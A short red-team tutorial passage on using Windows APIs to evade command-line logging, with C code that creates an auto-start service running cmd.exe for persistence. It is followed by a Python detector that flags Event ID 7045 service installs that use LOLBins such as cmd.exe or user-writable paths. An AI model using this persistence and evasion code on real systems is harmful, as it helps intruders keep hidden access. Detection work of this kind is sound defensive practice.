Benefits of Using APIs
Windows APIs are generally a better choice than commands for executing code or gathering information. The advantages of using APIs are:
1. Bypass command-line logging (Defender may look specifically at LOLBins)
2. Blend our activity in with that of regular applications
3. May offer additional functionality or better compatibility
Here is a code snippet that uses the service control APIs for persistence:
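```c
#include <windows.h>

int main(void) {
    // Open the local Service Control Manager database.
    SC_HANDLE hManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (hManager == NULL) return 1;
    // Register an auto-start service (ANSI variant, since the strings are narrow).
    SC_HANDLE service = CreateServiceA(
        hManager,
        "ServiceName",                     // service name
        "Display Name",                    // display name
        GENERIC_READ | GENERIC_EXECUTE,    // access requested on the new handle
        SERVICE_WIN32_OWN_PROCESS,         // runs in its own process
        SERVICE_AUTO_START,                // started at boot
        SERVICE_ERROR_IGNORE,              // start failures are ignored
        "C:\\Windows\\System32\\cmd.exe",  // binary path
        NULL, NULL, NULL, NULL, NULL
    );
    if (service != NULL) CloseServiceHandle(service);
    CloseServiceHandle(hManager);
    return 0;
}
```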
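A service created through `CreateService` is still registered by the Service Control Manager, which writes Event ID 7045 ("A service was installed in the system") to the System log even though no command line was logged. The following detection sketch is an added example, not code from the original page: it reviews exported 7045 events for unusual service binaries, and the watchlists, helper names and sample events are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Assumed watchlists for this example; tune them to the environment.
SUSPECT_BINARIES = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
                    "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
SUSPECT_DIRS = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")

def image_binary(image_path):
    """Lower-cased executable from an ImagePath, without quotes or arguments."""
    path = image_path.strip()
    if path.startswith('"'):
        return path[1:].split('"', 1)[0].lower()
    m = re.match(r"(.+?\.exe)(\s|$)", path, re.IGNORECASE)
    return (m.group(1) if m else path.split(" ", 1)[0]).lower()

def review_service_installs(events_xml):
    """Return (service, start type, binary, reasons) for suspicious 7045 events."""
    findings = []
    for event in ET.fromstring(events_xml).iterfind("e:Event", NS):
        if event.findtext("e:System/e:EventID", namespaces=NS) != "7045":
            continue  # only service-installation records are of interest
        data = {d.get("Name"): d.text or "" for d in event.iterfind("e:EventData/e:Data", NS)}
        exe = image_binary(data.get("ImagePath", ""))
        reasons = []
        if exe.rsplit("\\", 1)[-1] in SUSPECT_BINARIES:
            reasons.append("interpreter or LOLBin as service binary")
        if any(d in exe for d in SUSPECT_DIRS):
            reasons.append("binary in user-writable directory")
        if reasons:
            findings.append((data.get("ServiceName"), data.get("StartType"), exe, reasons))
    return findings

# Constructed sample in the shape of `wevtutil qe System /f:xml /e:Events` output.
EVT = '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
def _install(name, image_path, start):
    fields = {"ServiceName": name, "ImagePath": image_path, "StartType": start}
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return f"{EVT}<System><EventID>7045</EventID></System><EventData>{body}</EventData></Event>"

SAMPLE = "<Events>" + "".join([
    _install("ServiceName", r"C:\Windows\System32\cmd.exe", "auto start"),
    _install("VendorAgent", r'"C:\Program Files\Vendor\agent.exe" --service', "auto start"),
    _install("Updater", r"C:\ProgramData\upd\updater.exe -k", "demand start"),
    EVT + "<System><EventID>7036</EventID></System><EventData/></Event>",  # not an install
]) + "</Events>"

if __name__ == "__main__":
    print(*review_service_installs(SAMPLE), sep="\n")
```

The first constructed event mirrors the service created in the snippet above and is flagged because its `ImagePath` is `cmd.exe`; the quoted vendor path is parsed correctly and passes.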